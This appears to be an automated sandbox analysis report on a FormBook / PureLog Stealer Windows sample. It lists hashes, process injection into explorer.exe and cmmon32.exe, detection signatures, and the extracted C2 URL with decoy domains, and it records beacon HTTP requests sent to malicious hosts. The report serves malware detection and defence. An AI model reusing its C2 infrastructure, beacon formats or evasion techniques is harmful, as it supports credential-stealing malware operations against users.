
Windows Analysis Report
xU0wdBC6XWRZ6UY.exe

Overview

General Information

Sample name: xU0wdBC6XWRZ6UY.exe
Analysis ID: 1479545
MD5: fab057e49c317d42f565ef0efe766557
SHA1: ebdcbb656a7d0d9ca8c29239a190e1d0265573cd
SHA256: 956c41761587ea08a6eb3fca5b047ec8a3145a2d3ced9d8d3967ab351891bad4
Tags: exe, Formbook

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • xU0wdBC6XWRZ6UY.exe (PID: 1540 cmdline: "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe" MD5: FAB057E49C317D42F565EF0EFE766557)
    • xU0wdBC6XWRZ6UY.exe (PID: 1476 cmdline: "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe" MD5: FAB057E49C317D42F565EF0EFE766557)
      • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmmon32.exe (PID: 1292 cmdline: "C:\Windows\SysWOW64\cmmon32.exe" MD5: DEC326E5B4D23503EA5176878DDDB683)
          • cmd.exe (PID: 3840 cmdline: /c del "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.33pgaaa.com/ps15/"], "decoy": ["57797.asia", "jhpwt.net", "basketballdrillsforkids.com", "zgzf6.rest", "casinomaxnodepositbonus.icu", "uptocryptonews.com", "gomenasorry.com", "fortanix.space", "stripscity.xyz", "genbotdiy.xyz", "mayson-wedding.com", "neb-hub.net", "seancollinsmusic.com", "migraine-treatment-57211.bond", "prosperawoman.info", "tradefairleads.tech", "xn--yeminlitercme-6ob.com", "xwaveevent.com", "fashiontrendshub.xyz", "window-replacement-80823.bond", "simplesculpt.online", "ellipsive.com", "urbandollsllc.com", "kgwcmx.xyz", "marabudigital.online", "abcblindcompany.com", "seraphmovement.com", "overrideapp.com", "holistichealthviews.com", "lovemyhome.online", "mullermachinery.com", "packsperfeitas.shop", "gmgex1.com", "jlk168.com", "xyz-hd.xyz", "happysmall.online", "phwin777.vip", "market-pam.com", "kling-ai.xyz", "kaidifeiniroo.net", "822963429.xyz", "bet4win99.com", "ryuk-studio.com", "tricianihaonewyork.net", "plasoi.xyz", "mi006.com", "briefout.cloud", "urbangrowcity.fun", "yrund.asia", "morningritualtemplate.com", "eehuvvqj.xyz", "flymgl.com", "ux75.top", "bluemarblen5d.com", "trezorsuite.net", "thepeacedealers.com", "harlemshake-burgers.com", "thesvacha.com", "usdj.xyz", "stdaev.com", "your-coffee-to-talk.com", "passrmale.com", "resmierabaru20.shop", "window-replacement-22581.bond"]}
Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security

Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security

Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
Strings:
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83

Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Strings:
  • 0x18839:$sqlite3step: 68 34 1C 7B E1
  • 0x1894c:$sqlite3step: 68 34 1C 7B E1
  • 0x18868:$sqlite3text: 68 38 2A 90 C5
  • 0x1898d:$sqlite3text: 68 38 2A 90 C5
  • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C

(The full report lists 26 memory-dump Yara matches; the first five are shown above.)
Source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.unpack | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
Source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.unpack | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
Source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpack | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
Source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpack | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security

(The full report lists 9 unpacked-PE Yara matches; the first five are shown above.)
No Sigma rule has matched
No Snort rule has matched

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-07-23T18:28:45.882006+0200 | 2031412 | 53902 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-23T18:31:48.971715+0200 | 2031412 | 53909 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-23T18:32:14.054099+0200 | 2031412 | 53910 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-23T18:29:46.592917+0200 | 2031412 | 53904 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-23T18:29:06.265172+0200 | 2031412 | 53903 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-23T18:32:32.849943+0200 | 2031412 | 53911 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-23T18:30:06.593953+0200 | 2031412 | 53905 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-23T18:31:28.381840+0200 | 2031412 | 53908 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-23T18:30:47.257969+0200 | 2031412 | 53907 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-23T18:30:26.792714+0200 | 2031412 | 53906 | 80 | TCP | Malware Command and Control Activity Detected

AV Detection

Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.33pgaaa.com/ps15/"], "decoy": ["57797.asia", "jhpwt.net", "basketballdrillsforkids.com", "zgzf6.rest", "casinomaxnodepositbonus.icu", "uptocryptonews.com", "gomenasorry.com", "fortanix.space", "stripscity.xyz", "genbotdiy.xyz", "mayson-wedding.com", "neb-hub.net", "seancollinsmusic.com", "migraine-treatment-57211.bond", "prosperawoman.info", "tradefairleads.tech", "xn--yeminlitercme-6ob.com", "xwaveevent.com", "fashiontrendshub.xyz", "window-replacement-80823.bond", "simplesculpt.online", "ellipsive.com", "urbandollsllc.com", "kgwcmx.xyz", "marabudigital.online", "abcblindcompany.com", "seraphmovement.com", "overrideapp.com", "holistichealthviews.com", "lovemyhome.online", "mullermachinery.com", "packsperfeitas.shop", "gmgex1.com", "jlk168.com", "xyz-hd.xyz", "happysmall.online", "phwin777.vip", "market-pam.com", "kling-ai.xyz", "kaidifeiniroo.net", "822963429.xyz", "bet4win99.com", "ryuk-studio.com", "tricianihaonewyork.net", "plasoi.xyz", "mi006.com", "briefout.cloud", "urbangrowcity.fun", "yrund.asia", "morningritualtemplate.com", "eehuvvqj.xyz", "flymgl.com", "ux75.top", "bluemarblen5d.com", "trezorsuite.net", "thepeacedealers.com", "harlemshake-burgers.com", "thesvacha.com", "usdj.xyz", "stdaev.com", "your-coffee-to-talk.com", "passrmale.com", "resmierabaru20.shop", "window-replacement-22581.bond"]}
Source: xU0wdBC6XWRZ6UY.exe | ReversingLabs: Detection: 73%
Source: Yara match | File source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: xU0wdBC6XWRZ6UY.exe | Joe Sandbox ML: detected
Source: xU0wdBC6XWRZ6UY.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: xU0wdBC6XWRZ6UY.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmmon32.pdb | source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1362892072.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363227417.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL | source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1362892072.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363227417.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000003.1364936334.0000000004A16000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000003.1363062363.0000000004862000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: xU0wdBC6XWRZ6UY.exe, xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 0000000E.00000003.1364936334.0000000004A16000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000003.1363062363.0000000004862000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 4x nop then pop ebx | 11_2_00407A10
Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 4x nop then pop ebx | 11_2_00407ADD
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop ebx | 14_2_02C97ADD
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop ebx | 14_2_02C97A10

Networking

Source: C:\Windows\explorer.exe | Network Connect: 172.96.187.60 80
Source: C:\Windows\explorer.exe | Network Connect: 198.185.159.144 80
Source: Malware configuration extractor | URLs: www.33pgaaa.com/ps15/
Source: global traffic | HTTP traffic detected: GET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q== HTTP/1.1 | Host: www.resmierabaru20.shop | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ps15/?XtutFHLx=+OvncPmxK4E3ovTf4IdVLliDjSzyCopJXOwX4tpaGEeHBcqDgavndBw1dSHqFFxWSSZSfTMm+g==&_jATs=UfdXThPpQ4ST0 HTTP/1.1 | Host: www.thepeacedealers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ps15/?XtutFHLx=aPdMTWONMgqLFXL6I6D84LbJUFKzfvQKs5jv7ieivWkC5Cuuwn9riAtDpT7vHb1zFty4mtmWJQ==&_jATs=UfdXThPpQ4ST0 HTTP/1.1 | Host: www.33pgaaa.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=Kye4QYwCGZ93CUuJ7G3wCxFSkbsRF7hlwXf/oBbqQT4B5phfVvGGkKkS6yRwXurkmoW1rD9KnQ== HTTP/1.1 | Host: www.ellipsive.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ps15/?XtutFHLx=Jp/OLPjQh1lJnocY9w89QXitnE8TmDemwLH3w+grDpijucgoNCx/lT69JUoPCmCPyF9CRMydNg==&_jATs=UfdXThPpQ4ST0 HTTP/1.1 | Host: www.mayson-wedding.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=EF4JIPGNIcmyDue7LvVl2/edyrLqyOOWiNy0SIrLdOiQ87GLGj4j/HRcN2lkEgVcoy4RKpdq7w== HTTP/1.1 | Host: www.gmgex1.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ps15/?XtutFHLx=BR5e+vAYPKSU8wYOTLy7wpzRN5ByJvme3fpAhHNJMoSEpLzyyPH2rOLUFKU7hL9ObtDz64d8cw==&_jATs=UfdXThPpQ4ST0 HTTP/1.1 | Host: www.kaidifeiniroo.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 198.185.159.144
Source: Joe Sandbox View | IP Address: 23.227.38.74
Source: Joe Sandbox View | ASN Name: SQUARESPACEUS
Source: Joe Sandbox View | ASN Name: SINGLEHOP-LLCUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 occurrences)
Source: C:\Windows\explorer.exe | Code function: 12_2_0869EF82 getaddrinfo,setsockopt,recv | 12_2_0869EF82
Source: global traffic | DNS traffic detected: DNS query: www.resmierabaru20.shop
Source: global traffic | DNS traffic detected: DNS query: www.thepeacedealers.com
Source: global traffic | DNS traffic detected: DNS query: www.casinomaxnodepositbonus.icu
Source: global traffic | DNS traffic detected: DNS query: www.33pgaaa.com
Source: global traffic | DNS traffic detected: DNS query: www.ellipsive.com
Source: global traffic | DNS traffic detected: DNS query: www.mayson-wedding.com
Source: global traffic | DNS traffic detected: DNS query: www.gmgex1.com
Source: global traffic | DNS traffic detected: DNS query: www.passrmale.com
Source: global traffic | DNS traffic detected: DNS query: www.trezorsuite.net
Source: global traffic | DNS traffic detected: DNS query: www.gomenasorry.com
Source: global traffic | DNS traffic detected: DNS query: www.briefout.cloud
Source: global traffic | DNS traffic detected: DNS query: www.kaidifeiniroo.net
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Date: Tue, 23 Jul 2024 16:32:32 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4514
  Connection: close
  X-Frame-Options: SAMEORIGIN
  Referrer-Policy: same-origin
  Cache-Control: max-age=15
  Expires: Tue, 23 Jul 2024 16:32:47 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MTvpXyb%2BSeOxPw0qfZqdVYrhk0bD8wHuyWRKMZvHGN7KkyFmSadcxRdgYjPjnnCfXy%2B9e8gLGunCJMD6HNGJzbKrGOicX%2B1iqkuqf7J4E7MU4VSlLXYVUqIpSdRAzvvVCLYZxo4FyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
  Server-Timing: cfRequestDuration;dur=13.000011
  X-XSS-Protection: 1; mode=block
  X-Content-Type-Options: nosniff
  X-Permitted-Cross-Domain-Policies: none
  X-Download-Options: noopen
  Server: cloudflare
  CF-RAY: 8a7d112cc8f47c90-EWR
  alt-svc: h3=":443"; ma=86400
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69
  Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</ti
Source: explorer.exe, 0000000C.00000000.1312007503.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2275745871.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3741055942.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1308477475.0000000007306000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 0000000C.00000000.1312007503.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2275745871.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3741055942.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1308477475.0000000007306000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000000C.00000000.1312007503.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2275745871.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3738068248.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3741055942.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1308477475.0000000007306000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 0000000C.00000000.1312007503.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2275745871.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3741055942.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1308477475.0000000007306000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 0000000C.00000000.1311534834.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1311557126.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.3738832346.0000000007C70000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: xU0wdBC6XWRZ6UY.exe, 00000003.00000002.1297010966.00000000033E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.33pgaaa.com
Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.33pgaaa.com/ps15/
Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.33pgaaa.com/ps15/www.ellipsive.com
Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.33pgaaa.comReferer:
Source: explorer.exe, 0000000C.00000000.1315888639.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2275065911.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271546398.000000000C3FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077197592.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748567632.000000000C428000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2274367081.000000000C41F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.briefout.cloud
Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.briefout.cloud/ps15/
Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.briefout.cloud/ps15/www.kaidifeiniroo.net
